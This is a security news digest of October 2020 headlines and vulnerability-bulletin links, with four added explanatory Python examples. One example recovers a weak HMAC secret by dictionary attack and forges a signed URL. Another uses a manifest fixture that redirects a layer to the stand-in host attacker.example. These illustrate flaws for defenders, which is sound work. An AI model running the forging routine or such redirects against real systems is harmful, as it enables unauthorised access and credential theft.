For the past several months, I've been tracking a campaign that sends rather odd-looking emails like this.
---------------------------------------------
https://isc.sans.edu/diary/rss/26702
∗∗∗ Securing Your Online Store for the Holidays ∗∗∗
---------------------------------------------
Shopping season is here, and so is the opportunity for ecommerce site owners to grow their business and generate revenue. In light of the changed global ecommerce climate that this pandemic has produced, securing your website to protect your users, and your revenue streams, matters more than ever.
---------------------------------------------
https://blog.sucuri.net/2020/10/securing-your-online-store-for-the-holidays…
∗∗∗ Study: More than half of all Windows servers are security junk ∗∗∗
---------------------------------------------
Around 58 percent of all Windows servers on the internet no longer receive regular security updates and are therefore ticking time bombs.
---------------------------------------------
https://heise.de/-4933295
∗∗∗ How safe is your USB drive? ∗∗∗
---------------------------------------------
What are some of the key security risks to be aware of when using USB flash drives and how can you mitigate the threats?
---------------------------------------------
https://www.welivesecurity.com/2020/10/20/how-safe-is-your-usb-drive/
∗∗∗ Video: How to expose fraudulent advertising on the internet ∗∗∗
---------------------------------------------
Whether on Google, on social media or in apps, advertising lurks everywhere trying to get us to buy a particular product or use a particular service. But not every advertisement is legitimate.
---------------------------------------------
https://www.watchlist-internet.at/news/video-so-entlarven-sie-betruegerisch…
∗∗∗ Preventing inbound IP spoofing ∗∗∗
---------------------------------------------
Brigham Young University is currently sending out letters to internet providers pointing out that it is possible for these providers to receive inbound IP packets whose source addresses belong to the provider's own network.
---------------------------------------------
https://cert.at/de/blog/2020/10/ip-spoofing-inbound-verhindern
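The filtering rule behind the CERT.at post, as an added example written for this digest (not code from the blog post or from any vendor): packets arriving from the internet must never carry a source address out of the provider's own prefixes, and packets leaving customer links must carry only such addresses (the usual BCP 38 pair). The prefixes, the interface names "ext" and "cust", and the sample packets are assumptions constructed for illustration.

```python
"""Ingress/egress anti-spoofing filter over constructed packet records.
Added example; the prefixes, interface names and packets are assumptions."""
import ipaddress
from dataclasses import dataclass

# Assumption: the provider's own customer-facing address space.
OWN_PREFIXES = [ipaddress.ip_network(p) for p in ("203.0.113.0/24", "2001:db8::/32")]

# Source addresses that never legitimately arrive on an upstream link.
BOGON_PREFIXES = [ipaddress.ip_network(p) for p in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4",
    "::/128", "::1/128", "fe80::/10", "fc00::/7", "::ffff:0:0/96",
)]


@dataclass(frozen=True)
class Packet:
    iface: str   # "ext" = upstream/peering link, "cust" = customer-facing link
    src: str
    dst: str


def _in_any(addr, nets):
    # ipaddress returns False for a v4 address tested against a v6 network and vice versa.
    return any(addr in n for n in nets)


def filter_decision(pkt: Packet) -> str:
    """Return 'accept' or a drop reason for a packet seen on pkt.iface."""
    src = ipaddress.ip_address(pkt.src)
    if pkt.iface == "ext":
        # Inbound from the internet: our own prefixes can never be a genuine source.
        if _in_any(src, OWN_PREFIXES):
            return "drop:spoofed-own-prefix"
        if _in_any(src, BOGON_PREFIXES):
            return "drop:bogon-source"
        return "accept"
    if pkt.iface == "cust":
        # Outbound from customers: only our own prefixes may be sourced (BCP 38).
        if not _in_any(src, OWN_PREFIXES):
            return "drop:egress-not-own-prefix"
        return "accept"
    return "drop:unknown-interface"


def apply_filter(packets):
    return [(p.iface, p.src, filter_decision(p)) for p in packets]


# Constructed sample traffic.
SAMPLE = [
    Packet("ext", "198.51.100.7", "203.0.113.10"),    # normal inbound
    Packet("ext", "203.0.113.5", "203.0.113.10"),     # inbound claiming our own address
    Packet("ext", "10.1.2.3", "203.0.113.10"),        # bogon source
    Packet("ext", "2001:db8::1", "2001:db8::10"),     # inbound v6 with our own prefix
    Packet("cust", "203.0.113.42", "198.51.100.7"),   # normal outbound
    Packet("cust", "198.51.100.99", "198.51.100.7"),  # customer spoofing a foreign source
]

if __name__ == "__main__":
    for iface, src, verdict in apply_filter(SAMPLE):
        print(f"{iface:4} {src:20} {verdict}")
```

The "ext" branch is the check the letters ask providers to add; the "cust" branch is the egress side that stops the provider's own customers from being the source of spoofed traffic elsewhere.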
=====================
= Vulnerabilities =
=====================
∗∗∗ Big Blue Button: The big blue security risk ∗∗∗
---------------------------------------------
Critical security vulnerabilities that Golem.de reported to the developer of the video chat software Big Blue Button were only closed after months.
---------------------------------------------
https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisik…
∗∗∗ Chrome zero-day in the wild – patch now! ∗∗∗
---------------------------------------------
https://nakedsecurity.sophos.com/2020/10/21/chrome-zero-day-in-the-wild-pat…
∗∗∗ Oracle Critical Patch Update Advisory - October 2020 ∗∗∗
---------------------------------------------
https://www.oracle.com/security-alerts/cpuoct2020.html
∗∗∗ Security Bulletin: A security vulnerability in angular.js affects IBM Cloud Pak for Multicloud Management Infrastructure Management and Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: A security vulnerability in GO affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: A vulnerability has been identified in IBM Spectrum Scale where an unprivileged local user may cause a denial of service (CVE-2020-4411) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-…
∗∗∗ Security Bulletin: A security vulnerability in Node.js acorn and bootstrap-select affects IBM Cloud Pak for Multicloud Management Infrastructure Management and Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: BIND for IBM i is affected by CVE-2020-8622 and CVE-2020-8624 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-bind-for-ibm-i-is-affecte…
∗∗∗ Security Bulletin: A vulnerability in IBM Spectrum Scale packaged in IBM Elastic Storage System could cause a denial of service (CVE-2020-4756) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-sp…
∗∗∗ Security Bulletin: IBM MQ could leak sensitive information due to an error within the pre-v7 pubsub logic (CVE-2020-4319) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-could-allow-leak-s…
∗∗∗ Security Bulletin: Multiple vulnerabilities in GNU Binutils affect IBM Netezza Platform Software clients. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
=====================
= End-of-Day report =
=====================
Timeframe: Montag 19-10-2020 18:00 − Dienstag 20-10-2020 18:00
Handler: Dimitri Robl
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ Ryuk Ransomware Gang Uses Zerologon Bug for Lightning-Fast Attack ∗∗∗
---------------------------------------------
Researchers said the group was able to move from initial phish to full domain-wide encryption in just five hours.
---------------------------------------------
https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/1602…
∗∗∗ Mirai-alike Python Scanner, (Tue, Oct 20th) ∗∗∗
---------------------------------------------
Last week, I found an interesting Python script that behaves like a Mirai bot. It scans for vulnerable devices exposing their telnet (TCP/23) interface in the wild, then tries to connect using a dictionary of credentials.
---------------------------------------------
https://isc.sans.edu/diary/rss/26698
∗∗∗ Advanced Ransomware Attacks ∗∗∗
---------------------------------------------
SI-CERT, the national CSIRT of Slovenia has been handling reports of ransomware attacks on a regular basis since April 2012. Until 2019, attack victims were selected randomly as part of a mass-volume campaign aiming to spread the virus. However, since 2019 the attacks have been more targeted.
---------------------------------------------
https://connect.geant.org/2020/10/19/advanced-ransomware-attacks
∗∗∗ When buying on classified ad platforms: do not pay via the PayPal function "Send money to friends or family" ∗∗∗
---------------------------------------------
Criminals are also active on popular classified ad platforms such as willhaben, shpock or ebay Kleinanzeigen. Besides advance-payment and escrow fraud, the PayPal trick is another popular scheme for ripping off buyers.
---------------------------------------------
https://www.watchlist-internet.at/news/beim-kauf-auf-kleinanzeigen-plattfor…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security Bulletins Posted ∗∗∗
---------------------------------------------
Adobe has published security bulletins for Adobe Illustrator (APSB20-53), Adobe Dreamweaver (APSB20-55), Marketo (APSB20-60), Adobe Animate (APSB20-61), Adobe After Effects (APSB20-62), Adobe Photoshop (APSB20-63), Adobe Premiere Pro (APSB20-64), Adobe Media Encoder (APSB20-65), Adobe InDesign (APSB20-66) and Adobe Creative Cloud Desktop Application (APSB20-68).
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1930
∗∗∗ QNAP: Security updates for QTS fend off "Zerologon" attacks on NAS ∗∗∗
---------------------------------------------
Depending on their configuration, QNAP network storage devices can be attacked remotely via the "Zerologon" vulnerability. Updates for QTS are available.
---------------------------------------------
https://heise.de/-4932748
∗∗∗ Seven mobile browsers vulnerable to address bar spoofing attacks ∗∗∗
---------------------------------------------
Vulnerabilities allow attackers to trick users into accessing malicious sites while showing the incorrect URL in the address bar.
---------------------------------------------
https://www.zdnet.com/article/seven-mobile-browsers-vulnerable-to-address-b…
∗∗∗ Security Bulletin: Cross-Site Scripting Security Vulnerability Affects IBM Sterling B2B Integrator Standard Edition (CVE-2020-4564) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-secu…
∗∗∗ Security Bulletin: A vulnerability has been identified in IBM Spectrum Scale where an unprivileged local user may cause a denial of service (CVE-2020-4411) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-…
∗∗∗ Security Bulletin: IBM Elastic Storage System 3000 is affected by weak cryptographic algorithm (CVE-2020-4350) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-syste…
∗∗∗ Security Bulletin: SQL Injection Vulnerability Affects the Graphic Process Modeler in IBM Sterling B2B Integrator (CVE-2019-4680) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-sql-injection-vulnerabili…
∗∗∗ Security Bulletin: There are multiple vulnerabilities in the Linux Kernel used in IBM Elastic Storage System ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-there-are-multiple-vulner…
∗∗∗ Security Bulletin: A vulnerability in IBM Spectrum Scale packaged in IBM Elastic Storage System could cause a denial of service (CVE-2020-4756) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-sp…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM MessageGateway ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Cross-Site Scripting Vulnerability Affects IBM Sterling File Gateway (CVE-2020-4564) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln…
∗∗∗ Security Bulletin: Multiple vulnerabilities affect the IBM Spectrum Scale GUI. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in the Linux Kernel used in IBM Elastic Storage System ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ XSA-347 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-347.html
∗∗∗ XSA-346 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-346.html
∗∗∗ XSA-345 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-345.html
∗∗∗ XSA-332 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-332.html
∗∗∗ XSA-331 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-331.html
∗∗∗ XSA-286 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-286.html
∗∗∗ Security Vulnerabilities fixed in Firefox 82 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2020-45/
∗∗∗ Synology-SA-20:24 Media Server ∗∗∗
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_20_24
∗∗∗ Synology-SA-20:23 Download Station ∗∗∗
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_20_23
∗∗∗ VMware ESXi: Multiple vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-1003
∗∗∗ Nagios Enterprises Nagios XI: Multiple vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-1005
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 16-10-2020 18:00 − Montag 19-10-2020 18:00
Handler: Dimitri Robl
Co-Handler: Robert Waldner
=====================
= News =
=====================
∗∗∗ Hackers now abuse BaseCamp for free malware hosting ∗∗∗
---------------------------------------------
Phishing campaigns have started to use Basecamp as part of malicious phishing campaigns that distribute malware or steal your login credentials.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-now-abuse-basecamp-f…
∗∗∗ Enumerate AWS API Permissions Without Logging to CloudTrail ∗∗∗
---------------------------------------------
The following is a technical writeup for a bug I found in the AWS API that allows you to enumerate certain permissions for a role without logging to CloudTrail. It affects 645 different API actions across 40 different AWS services. This would be beneficial for a Penetration Tester or a Red Teamer to enumerate what permissions the role or user they’ve compromised has access to without alerting the blue team as no logs are generated in CloudTrail.
---------------------------------------------
https://frichetten.com/blog/aws-api-enum-vuln/
∗∗∗ Secret fragments: Remote code execution on Symfony based websites ∗∗∗
---------------------------------------------
This configuration value, secret, is also used, for instance, to build CSRF tokens and remember-me tokens. Given its importance, this value must obviously be very random. Unfortunately, we discovered that oftentimes, the secret either has a default value, or there exist ways to obtain the value, bruteforce it offline, or to purely and simply bypass the security check that it is involved with. It most notably affects Bolt, eZPlatform, and eZPublish.
---------------------------------------------
https://www.ambionics.io/blog/symfony-secret-fragment
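Why a default or guessable secret breaks the check the post describes, as an added example written for this digest: an HMAC-SHA256 URL signer of the kind used for fragment and remember-me tokens, and the offline dictionary attack that recovers a weak secret from a single captured signed URL and then forges a signature for a different path. This is not Symfony's UriSigner or Ambionics' code; the "_hash" parameter name, the default-looking secret, the wordlist and the URLs are constructed assumptions.

```python
"""HMAC-signed URL and an offline secret-recovery attack against a weak secret.
Added example; signer layout, secret values and URLs are constructed assumptions."""
import base64
import hashlib
import hmac
import secrets
from urllib.parse import unquote, urlencode


def sign_uri(uri, secret):
    """Append _hash = base64(HMAC-SHA256(secret, uri)) as the last query parameter."""
    mac = hmac.new(secret.encode(), uri.encode(), hashlib.sha256).digest()
    sep = "&" if "?" in uri else "?"
    return uri + sep + urlencode({"_hash": base64.b64encode(mac).decode()})


def split_signed(signed):
    """Return (uri without the _hash parameter, raw mac bytes)."""
    head, _, encoded = signed.rpartition("_hash=")
    return head[:-1], base64.b64decode(unquote(encoded))   # head[:-1] drops the '?' or '&'


def check_uri(signed, secret):
    """Server-side verification: constant-time compare against a fresh HMAC."""
    uri, mac = split_signed(signed)
    expected = hmac.new(secret.encode(), uri.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(mac, expected)


def recover_secret(signed, candidates):
    """Attacker side: no further requests are needed once one signed URL is known."""
    for cand in candidates:
        if check_uri(signed, cand):
            return cand
    return None


def forge_with_recovered_secret(captured, wordlist, target_uri):
    """Recover the secret from a captured URL and sign an attacker-chosen one with it."""
    found = recover_secret(captured, wordlist)
    if found is None:
        return None, None
    return found, sign_uri(target_uri, found)


def generate_secret():
    """The fix: a random secret no wordlist will contain (256 bits, hex encoded)."""
    return secrets.token_hex(32)


# Constructed: an application left running with a default-looking secret.
WEAK_SECRET = "ThisTokenIsNotSoSecretChangeIt"
WORDLIST = ["", "secret", "changeme", "ThisTokenIsNotSoSecretChangeIt", "s3cr3t"]
CAPTURED_URI = "https://app.example/_fragment?_path=_controller%3Dapp.hello"
TARGET_URI = "https://app.example/_fragment?_path=_controller%3Dapp.admin"


def demo():
    """Return (recovered secret, whether the forged URL passes the server's check)."""
    captured = sign_uri(CAPTURED_URI, WEAK_SECRET)
    found, forged = forge_with_recovered_secret(captured, WORDLIST, TARGET_URI)
    return found, forged is not None and check_uri(forged, WEAK_SECRET)


if __name__ == "__main__":
    print(demo())
    strong = generate_secret()
    print(recover_secret(sign_uri(CAPTURED_URI, strong), WORDLIST))
```

The HMAC itself is sound; the attack works only because the key is drawn from a tiny space, which is why the post's remediation is a long random secret rather than a different signing scheme.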
=====================
= Vulnerabilities =
=====================
∗∗∗ Magento, Visual Studio Code users: You need to patch! ∗∗∗
---------------------------------------------
* Microsoft has fixed CVE-2020-17023, a remote code execution vulnerability in Visual Studio Code, its free and extremely popular source-code editor that’s available for Windows, macOS and Linux.
* Microsoft has also fixed an RCE (CVE-2020-17022) in the way that Microsoft Windows Codecs Library handles objects in memory, which could be triggered by a program processing a specially crafted image file. It only affects Windows 10 users, and only if they installed the optional HEVC or “HEVC from Device Manufacturer” media codecs from Microsoft Store.
* After fixing just one Adobe Flash Player flaw on October 2020 Patch Tuesday, Adobe has followed up with security updates for several Magento Commerce and Magento Open Source versions.
---------------------------------------------
https://www.helpnetsecurity.com/2020/10/19/magento-visual-studio-code-users…
∗∗∗ Atlassian Jira Software: Vulnerability allows bypassing of security measures (CVE-2020-14185) ∗∗∗
---------------------------------------------
A remote, anonymous attacker can exploit a vulnerability in Atlassian Jira Software to bypass security measures.
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-1002
∗∗∗ Discord desktop app vulnerability chain triggered remote code execution attacks ∗∗∗
---------------------------------------------
Discord has patched a critical issue in the desktop version of the messaging app which left users vulnerable to remote code execution (RCE) attacks.
---------------------------------------------
https://www.zdnet.com/article/discord-desktop-app-vulnerable-to-remote-code…
∗∗∗ FRITZ!Box DNS Rebinding Protection Bypass ∗∗∗
---------------------------------------------
RedTeam Pentesting discovered a vulnerability in FRITZ!Box router devices which allows DNS answers pointing to IP addresses in the private local network to be resolved despite the DNS rebinding protection mechanism.
---------------------------------------------
https://www.redteam-pentesting.de/en/advisories/rt-sa-2020-003/
∗∗∗ ReQuest Serious Play F3 Media Server 7.0.3 Unauthenticated Remote Code Execution ∗∗∗
---------------------------------------------
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5602.php
∗∗∗ ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service ∗∗∗
---------------------------------------------
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php
∗∗∗ ReQuest Serious Play F3 Media Server 7.0.3 Debug Log Disclosure ∗∗∗
---------------------------------------------
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5600.php
∗∗∗ ReQuest Serious Play Media Player 3.0 Directory Traversal File Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5599.php
∗∗∗ Security Bulletin: Multiple Oracle Database Server Security Vulnerabilities Affect IBM Emptoris Supplier Lifecycle Mgmt ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-oracle-database-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in the IBM SDK, Java Technology Edition affects IBM Performance Management products Q3 2020 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple Oracle Database Server Security Vulnerabilities Affect IBM Emptoris Program Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-oracle-database-…
∗∗∗ Security Bulletin: Multiple Oracle Database Server Security Vulnerabilities Affect IBM Emptoris Sourcing ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-oracle-database-…
∗∗∗ Security Bulletin: Multiple Oracle Database Server Security Vulnerabilities Affect IBM Emptoris Contract Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-oracle-database-…
∗∗∗ Security Bulletin: Multiple Oracle Database Server Security Vulnerabilities Affect IBM Emptoris Strategic Supply Management Platform ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-oracle-database-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by a DB2 jar vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 15-10-2020 18:00 − Freitag 16-10-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ NPM nukes NodeJS malware opening Windows, Linux reverse shells ∗∗∗
---------------------------------------------
NPM has removed multiple packages hosted on its repository this week that established connection to remote servers and exfiltrated user data. These 4 packages had collected over 1,000 total downloads over the course of the last few months up until being removed by NPM yesterday.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/npm-nukes-nodejs-malware-ope…
∗∗∗ CVE-2020-16898: Windows ICMPv6 Router Advertisement RRDNS Option Remote Code Execution Vulnerability, (Thu, Oct 15th) ∗∗∗
---------------------------------------------
Highlights
- Do not disable IPv6 entirely unless you want to break Windows in interesting ways.
- This can only be exploited from the local subnet.
- But it may lead to remote code execution / BSOD
- PoC exploit is easy, but actual RCE is hard.
- Patch
For more details, see also the YouTube video I just published: [...]
---------------------------------------------
https://isc.sans.edu/diary/rss/26684
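A strict check of the RDNSS option the highlights turn on, as an added example written for this digest (not code from the diary, from Microsoft, or from any OS network stack): under RFC 8106 an RDNSS option is an 8-byte header followed by whole 16-byte addresses, so its Length field (in units of 8 octets) must be odd and at least 3; an even Length leaves 8 bytes that are not a complete address, which is exactly the kind of input a parser must reject rather than guess about. The Router Advertisements below are constructed, starting at the ICMPv6 header.

```python
"""Strict parser for ICMPv6 Router Advertisement options that flags malformed RDNSS
options. Added example for inspection/detection; the packets are constructed."""
import ipaddress
import struct

ICMPV6_ROUTER_ADVERTISEMENT = 134
OPT_RDNSS = 25
RA_HEADER_LEN = 16   # type, code, checksum, hop limit, flags, router lifetime, reachable, retrans


def parse_ra_options(pkt):
    """Walk the option TLVs after the RA header.
    Returns {"findings": [...], "options": [(type, length), ...], "rdnss": [addresses]}."""
    result = {"findings": [], "options": [], "rdnss": []}
    if len(pkt) < RA_HEADER_LEN or pkt[0] != ICMPV6_ROUTER_ADVERTISEMENT:
        result["findings"].append("not a complete Router Advertisement")
        return result
    off = RA_HEADER_LEN
    while off < len(pkt):
        if len(pkt) - off < 2:
            result["findings"].append(f"truncated option header at offset {off}")
            break
        opt_type, opt_len = pkt[off], pkt[off + 1]
        if opt_len == 0:
            result["findings"].append(f"zero-length option type {opt_type} at offset {off}")
            break
        nbytes = opt_len * 8
        if off + nbytes > len(pkt):
            result["findings"].append(f"option type {opt_type} length {opt_len} overruns packet")
            break
        if opt_type == OPT_RDNSS:
            findings, addrs = check_rdnss(opt_len, pkt[off + 2:off + nbytes], off)
            result["findings"].extend(findings)
            result["rdnss"].extend(addrs)
        result["options"].append((opt_type, opt_len))
        off += nbytes
    return result


def check_rdnss(opt_len, body, off):
    """RFC 8106: RDNSS = 8-byte header + n * 16-byte addresses, so Length = 1 + 2n."""
    findings = []
    if opt_len < 3:
        findings.append(f"RDNSS at offset {off}: length {opt_len} below minimum 3")
    if opt_len % 2 == 0:
        findings.append(f"RDNSS at offset {off}: even length {opt_len}, trailing 8 bytes are not a whole address")
    addr_bytes = body[6:]   # body starts after type/length: skip reserved(2) + lifetime(4)
    addrs = [str(ipaddress.IPv6Address(addr_bytes[i:i + 16]))
             for i in range(0, len(addr_bytes) - 15, 16)]   # whole addresses only
    return findings, addrs


def is_suspicious(pkt):
    return bool(parse_ra_options(pkt)["findings"])


def build_ra(options):
    """Constructed RA: ICMPv6 header with zero checksum, hop limit 64, lifetime 1800."""
    hdr = struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERTISEMENT, 0, 0, 64, 0, 1800, 0, 0)
    return hdr + options


def rdnss_option(length_field, addrs):
    """Build an RDNSS option with an arbitrary (possibly wrong) Length field."""
    opt = struct.pack("!BBHI", OPT_RDNSS, length_field, 0, 3600)
    for a in addrs:
        opt += ipaddress.IPv6Address(a).packed
    return opt


GOOD_RA = build_ra(rdnss_option(3, ["2001:db8::53"]))
# Even Length: one address plus 8 filler bytes that a lenient parser would misread.
EVEN_LENGTH_RA = build_ra(rdnss_option(4, ["2001:db8::53"]) + b"\x00" * 8)
# Length claims more data than the packet carries.
OVERRUN_RA = build_ra(rdnss_option(5, ["2001:db8::53"]))

if __name__ == "__main__":
    for name, pkt in (("good", GOOD_RA), ("even", EVEN_LENGTH_RA), ("overrun", OVERRUN_RA)):
        print(name, parse_ra_options(pkt))
```

Because the option is only accepted on the local link (the RA must come from a neighbour), a check like this belongs at the point where RAs are inspected, for example in an IDS rule set or a monitoring tap on the access network; it does not replace applying the patch.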
∗∗∗ Traffic Analysis Quiz: Ugly-Wolf.net, (Fri, Oct 16th) ∗∗∗
---------------------------------------------
It's that time of the month again... Time for another traffic analysis quiz! This one is from a Windows 10 client logged into an Active Directory (AD) environment.
---------------------------------------------
https://isc.sans.edu/diary/rss/26688
∗∗∗ CVE-2020-15157 "ContainerDrip" Write-up ∗∗∗
---------------------------------------------
CVE-2020-15157: If an attacker publishes a public image with a crafted manifest that directs one of the image layers to be fetched from a web server they control and they trick a user or system into pulling the image, they can obtain the credentials used by ctr/containerd to access that registry. In some cases, this may be the user’s username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other [...]
---------------------------------------------
https://darkbit.io/blog/cve-2020-15157-containerdrip
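The manifest condition the write-up describes, as an added example written for this digest (not code from the Darkbit post or from containerd): an image manifest lists its layers, and a layer may carry a `urls` field naming where its blob can be fetched instead of the registry. The check below flags every layer URL whose host is not the registry the image was pulled from, and shows the credential rule a client should follow so that registry credentials never travel to such a host. The manifest and registry name are constructed for illustration.

```python
"""Audit an OCI/Docker image manifest for layer URLs that point away from the registry,
and decide which credentials (if any) a pull may present to a layer URL.
Added example; the manifest, hosts and credential tuple are constructed."""
import json
from urllib.parse import urlsplit


def _same_registry(url, registry_host):
    """True only for https URLs whose host is exactly the registry we authenticated to."""
    parts = urlsplit(url)
    return parts.scheme == "https" and (parts.hostname or "").lower() == registry_host.lower()


def audit_manifest(manifest_json, registry_host):
    """Return [(layer digest, url)] for every layer URL that leaves the registry."""
    manifest = json.loads(manifest_json)
    risky = []
    for layer in manifest.get("layers", []):
        for url in layer.get("urls", []):
            if not _same_registry(url, registry_host):
                risky.append((layer.get("digest"), url))
    return risky


def credentials_for(url, registry_host, registry_creds):
    """Present registry credentials only to the registry itself; fetch anything else anonymously."""
    return registry_creds if _same_registry(url, registry_host) else None


# Constructed manifest: one ordinary layer, one layer redirected to a foreign host,
# one foreign-type layer whose URL still points at the registry.
SAMPLE_MANIFEST = json.dumps({
    "schemaVersion": 2,
    "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
    "config": {"mediaType": "application/vnd.docker.container.image.v1+json",
               "size": 1, "digest": "sha256:" + "a" * 64},
    "layers": [
        {"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 1, "digest": "sha256:" + "b" * 64},
        {"mediaType": "application/vnd.docker.image.rootfs.foreign.diff.tar.gzip",
         "size": 1, "digest": "sha256:" + "c" * 64,
         "urls": ["https://attacker.example/layer.tar.gz"]},
        {"mediaType": "application/vnd.docker.image.rootfs.foreign.diff.tar.gzip",
         "size": 1, "digest": "sha256:" + "d" * 64,
         "urls": ["https://registry.example/v2/lib/img/blobs/sha256:" + "d" * 64]},
    ],
})

REGISTRY = "registry.example"
REGISTRY_CREDS = ("ci-bot", "constructed-password")   # constructed placeholder

if __name__ == "__main__":
    for digest, url in audit_manifest(SAMPLE_MANIFEST, REGISTRY):
        print("foreign layer URL:", digest, url, "creds:", credentials_for(url, REGISTRY, REGISTRY_CREDS))
```

Running the audit before a pull (for example in an admission hook or a CI step) turns the silent leak into a visible finding; the `credentials_for` rule is the client-side fix, which the write-up's affected versions lacked.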
∗∗∗ Drupal CMS: OAuth Server module vulnerable to SQL injection attacks ∗∗∗
---------------------------------------------
The OAuth Server module for Drupal 8 needs an update to 8.x-1.1. The new version closes a "moderately critical" vulnerability.
---------------------------------------------
https://heise.de/-4930778
=====================
= Vulnerabilities =
=====================
∗∗∗ VMware Horizon Client update addresses a denial-of-service vulnerability (CVE-2020-3991) ∗∗∗
---------------------------------------------
VMware Horizon Client for Windows contains a denial-of-service vulnerability due to a file system access control issue during install time. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9.
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0022.html
∗∗∗ Critical vulnerability in SonicWall firewall exploitable for denial-of-service attacks ∗∗∗
---------------------------------------------
Updates are available for several versions of SonicOS that fix one critical vulnerability and ten further ones rated from "Medium" to "High".
---------------------------------------------
https://heise.de/-4930351
∗∗∗ CVE-2020-17022 | Microsoft Windows Codecs Library Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code.
---------------------------------------------
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020…
∗∗∗ Adobe patches Magento bugs that lead to code execution, customer list tampering ∗∗∗
---------------------------------------------
The out-of-band security update tackles eight critical and important vulnerabilities.
---------------------------------------------
https://www.zdnet.com/article/adobe-patches-magento-bugs-that-lead-to-code-…
∗∗∗ BlackBerry Powered by Android Security Bulletin - September 2020 ∗∗∗
---------------------------------------------
